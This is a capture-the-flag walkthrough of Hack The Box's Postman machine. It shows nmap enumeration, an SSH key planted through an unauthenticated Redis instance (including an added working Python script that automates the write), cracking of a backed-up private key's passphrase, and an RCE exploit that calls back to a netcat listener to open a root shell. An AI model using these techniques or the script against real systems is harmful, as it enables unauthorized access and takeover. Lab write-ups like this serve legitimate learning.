I enjoy doing CTFs and I think everyone should try them; they let us hone our skills while having a little fun at the same time. This walkthrough is for Hack The Box's Postman machine, which can be found here.
Early disclaimer: all information that could lead to a quick win has been redacted. Enjoy!
Enumeration
In the enumeration stage our goal is to gather information on the target with the aim of finding a vulnerability. My first step is to use nmap to get a feel for which ports are open on the target machine.
Let's break down the scan and what it found. sudo runs nmap as root, which it needs for the raw-socket SYN scan and OS fingerprinting that -A relies on. -A does OS detection, service version detection, script scanning and traceroute; note that this is a very loud scan technique. -T4 sets the timing template, which ranges from -T0 to -T5, where 5 is the fastest. Finally we have the IP address of the target machine.
sudo nmap -A -T4 10.129.2.1
In the results of the scan we can see that port 22 (SSH), port 80 (HTTP) and port 10000 (another HTTP service) are open. This was an intensive scan that takes a long time per port, which is why nmap only probes the 1000 most common ports by default. For this reason it is also worth running a quick sweep of all 65535 ports:
sudo nmap -p- --max-retries 1 10.129.2.1
This reveals an additional service the first scan missed: port 6379, running Redis.
Now that we know what the scans found we can enumerate the machine further.
Let’s look at the hosted webpages:
This page is under construction and does not seem to contain any significant information.
On the login page we can try a couple of default combinations like admin:admin, root:root and root:toor. Googling around, I couldn't find any listed default passwords for the service.
Note: I did not do it, but this would have been a good time to run a web directory brute-force scan. This can be done with Dirb or gobuster.
Next we can use searchsploit to look for publicly available exploits.
Here we can see one remote code execution exploit, but it requires valid credentials.
Redis Foothold
Next we use searchsploit to see whether any exploits are available for Redis.
None of the available exploits are useful here. We can install redis-tools to interact with the service and enumerate it.
Now that it is installed we can use the following command to connect to the service; note that no password is requested, so the instance is unauthenticated:
redis-cli -h 10.129.2.1
The following screenshot shows me trying to figure out how to use redis-cli, as it was the first time I had used it. The following command displays all configuration values:
config get *
Here we can see "/var/lib/redis/.ssh". /var/lib/redis is the home directory of the redis service account, so if the service can write into that .ssh directory we could drop our own public key there and log in over SSH as that user.
config set dir /var/lib/redis/.ssh
Redis answers OK, which means the service can change into that directory and will write its dump file there. Since we can reach it, the next question is how to get an SSH key into it. I found an article by Nairuz Abulhul that explains it very well. You can read that here. Next we generate an SSH key pair:
With our new key we now need to upload it. The trick is to store the public key as a value in the database, then point the dump directory and filename at the .ssh directory so that a save writes the database out as authorized_keys:
10.129.2.1:6379> config set dir /var/lib/redis/.ssh
OK
10.129.2.1:6379> config set dbfilename "authorized_keys"
OK
10.129.2.1:6379> save
OK
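As an added example (not code from the original write-up, and not from the referenced article), the Python below performs the same sequence as the redis-cli session above but speaks the RESP wire protocol directly, which makes the mechanism visible: the public key is stored as a value, the dump directory and filename are pointed at the .ssh directory, and SAVE writes the RDB file out as authorized_keys. The key name ssh_key, the constructed SAMPLE_PUBKEY and the push_key connection helper are assumptions. The blank-line padding is the part people most often get wrong: the RDB file wraps the value in binary header and trailer bytes, and sshd only accepts the key if it sits on a line by itself, skipping the unparsable lines around it.

```python
"""Added example: the Redis-to-authorized_keys write as raw RESP commands.

This is NOT code from the original write-up; the key name "ssh_key", the
constructed SAMPLE_PUBKEY and the push_key connection helper are assumptions.
"""
import socket
from typing import List, Tuple

# Constructed sample key for the offline demo (not a real key).
SAMPLE_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0Example attacker@kali\n"


def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings (what redis-cli sends).

    resp_command("SAVE") -> b"*1\\r\\n$4\\r\\nSAVE\\r\\n"
    Bulk strings are length-prefixed, so a value containing newlines is safe,
    which is why `redis-cli -x set` can load a whole file as one value.
    """
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def pad_pubkey(pubkey: str) -> str:
    """Surround the key with blank lines.

    Redis writes the value inside an RDB file with binary header/trailer bytes.
    sshd reads authorized_keys line by line and skips lines it cannot parse,
    so the key must start and end on its own line to be recognised.
    """
    return "\n\n" + pubkey.strip() + "\n\n"


def parse_reply(data: bytes) -> Tuple[str, str]:
    """Decode the RESP replies we expect: +status, -error, or a $bulk string."""
    head, _, rest = data.partition(b"\r\n")
    kind = chr(head[0])
    if kind == "+":
        return "status", head[1:].decode()
    if kind == "-":
        return "error", head[1:].decode()
    if kind == "$":
        length = int(head[1:])
        return "bulk", "" if length < 0 else rest[:length].decode()
    raise ValueError("unhandled RESP reply type %r" % kind)


def build_foothold(pubkey: str,
                   target_dir: str = "/var/lib/redis/.ssh",
                   key_name: str = "ssh_key") -> List[bytes]:
    """The four commands, in order, that turn an RDB dump into authorized_keys."""
    return [
        resp_command("SET", key_name, pad_pubkey(pubkey)),            # value to dump
        resp_command("CONFIG", "SET", "dir", target_dir),              # where to dump
        resp_command("CONFIG", "SET", "dbfilename", "authorized_keys"),  # file name
        resp_command("SAVE"),                                          # write it out
    ]


def push_key(host: str, port: int, pubkey: str) -> List[Tuple[str, str]]:
    """Send the sequence to an unauthenticated Redis and stop on the first error.

    Only meaningful against a live target such as the box in the write-up;
    offline, exercise the encoders above instead.
    """
    replies = []
    with socket.create_connection((host, port), timeout=5) as sock:
        for cmd in build_foothold(pubkey):
            sock.sendall(cmd)
            kind, msg = parse_reply(sock.recv(4096))
            replies.append((kind, msg))
            if kind == "error":
                name = cmd.split(b"\r\n")[2].decode()
                raise RuntimeError("Redis refused %s: %s" % (name, msg))
    return replies


if __name__ == "__main__":
    # Show the exact bytes redis-cli would put on the wire for the four steps.
    for cmd in build_foothold(SAMPLE_PUBKEY):
        print(cmd)
```

Against a live target you would call push_key("10.129.2.1", 6379, open("id_rsa.pub").read()) and then try ssh -i id_rsa redis@10.129.2.1. If CONFIG SET dir returns an error, the directory either does not exist or is not writable by the redis user; if everything returns OK but SSH still refuses the key, check the padding, because a key that shares a line with RDB bytes is silently ignored by sshd.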
Now that the key has been written out we can connect to the server over SSH as the redis user, whose home directory we just wrote into:
Privilege Escalation
Now we are back to enumerating the system. We need to find something that lets us get a session as a higher-privileged user. I start by manually looking through directories and trying commands like:
sudo -l
find / -perm -4000 -print 2>/dev/null
We can see that there is another user called Matt:
We also find an interesting file, id_rsa.bak. The name hints that someone made a backup of their private SSH key.
With this we can attempt to crack its passphrase using John the Ripper and the rockyou.txt wordlist.
Here we use ssh2john.py to convert the encrypted key into a hash format John understands. Next we feed that file to John with the rockyou.txt wordlist. This works and we get the passphrase!
With this passphrase we can now attempt a login to the web application on port 10000, in case it has been reused:
One of the exploits I found earlier required a username and password for RCE. We can now try that exploit. You can also find it here. Before we run it we need to set up a listener on our machine:
sudo nc -lvp 1432
Now we run the exploit:
python webExploit.py --rhost 10.129.2.1 -u Matt -p [redacted] --lhost 10.10.16.101 --lport 1432 -s True
Now we can check our netcat listener:
We now have a root shell, which lets us collect both flags on this box.
Conclusion
Thanks for joining me on this journey. I had a blast and I learned something new! This box introduced me to Redis and required me to do some research to complete it, but the challenge has been overcome. I hope you share my sentiments, and feel free to read my other hacking articles. Happy hacking!